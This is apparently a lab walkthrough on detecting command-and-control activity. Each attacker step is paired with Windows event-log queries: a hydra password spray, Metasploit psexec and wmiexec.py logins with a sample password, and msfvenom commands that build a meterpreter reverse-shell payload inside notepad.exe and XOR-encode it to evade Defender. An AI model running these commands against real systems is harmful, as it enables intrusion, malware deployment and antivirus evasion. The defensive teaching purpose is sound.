Detecting Command and Control frameworks via Sysmon and Windows Event Logging

Attacker launches password spray

Attacker

Password spray: hydra -L users.txt -P seasons-2023.txt 192.168.37.237 smb -u

Defender

Count successful (4624) and failed (4625) logins:

Get-WinEvent -Path C:\labs\valkyrie-security-logons.evtx | Group-Object id -NoElement | sort count

Attacker uses sprayed credentials to attempt to log in via Metasplot’s psexec

Attacker
msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.37.237
msf6 > set SMBUser fgaeta
msf6 > set SMBPass W1nter2023!
msf6 > exploit
Defender

Service was created (before Defender killed it):

Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7045}| fl

Command was executed (event 4688):

Get-WinEvent @{Path="C:\labs\valkyrie-security.evtx";id=4688}| Where {$_.Message -like "*powershell.exe -nop*"} | fl

Windows Defender Antivirus killed the connection:

Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | Where {$_.Message -like "*powershell.exe -nop*"} | fl

Attacker logs in with wmiexec.py:

Attacker

wmiexec.py fgaeta:W1nter2023\!@192.168.37.237

Defender

Microsoft Defender Antivirus: zero logs.

Sysmon event 1 (and security event 4688) shows WmiPrvSE.exe launching cmd.exe and redirecting to the ADMIN$ share:

Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*ADMIN$*"} | fl

Attacker runs ‘whoami -all’:

Attacker

Defender

Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";} | Where {$_.Message -like "*whoami*"} | fl

Attacker creates plan.exe with msfvenom:

Attacker

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -x notepad.exe -f exe > plan.exe

Attacker uploads plan.exe via wmiexex.py’s lput, tries to run it, and fails:

Defender

Upload:

Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=11} | Where {$_.Message -like "*plan.exe*"} | fl

The command executed:

Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*Image: C:\Users\fgaeta\plan.exe*"} | fl

Then Windows Defender killed it:

Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1116} | Where {$_.Message -like "*plan.exe*"} | fl | more

Attacker uses xor encoding and re-uploads plan.exe

Attacker

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -i 10 -e x64/xor_dynamic -x notepad.exe -f exe > plan.exe

The key difference: -e x64/xor_dynamic

Upload and execute:

Reverse meterpreter shell connects to Metasploit:

Defender

Upload/execution: same events as before.

Reverse shell connection to port 8080:

Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=3} | Where {$_.Message -like "*plan.exe*"} | fl

Attacker runs getsystem

Attacker

getsystem fails, so the attacker enables RDP

The attacker then logs in via RDP and disables Windows Defender Antivirus:

Defender

Windows Defender Antivirus kills the getsystem command

Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | fl | more

RDP is enabled:

Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*remotedesktop*"} | fl

Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7040}| Where {$_.Message -like "*remote*"} | fl

Attacker runs getsystem again

Attacker

getsystem is successful, so attacker migrates the meterpreter DLL to another process and steals a domain admin token

Defender

Process migration:

Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=8} | Where {$_.Message -like "*plan.exe*"} | fl

Nothing was logged during the token theft and impersonation of GALACTICA/Administrator.

Attacker becomes domain admin

Attacker

Attacker runs meterpreter’s shell command:

Attacker creates a domain account:

Atracker uses wmic to add new account to the domain admin group:

Defender

Account creation:

Get-WinEvent @{Path="\labs\pegasus-security.evtx"; id=4720} | fl

New domain admin:

Get-WinEvent @{Path="\labs\\pegasus-security.evtx"; id=4737} | fl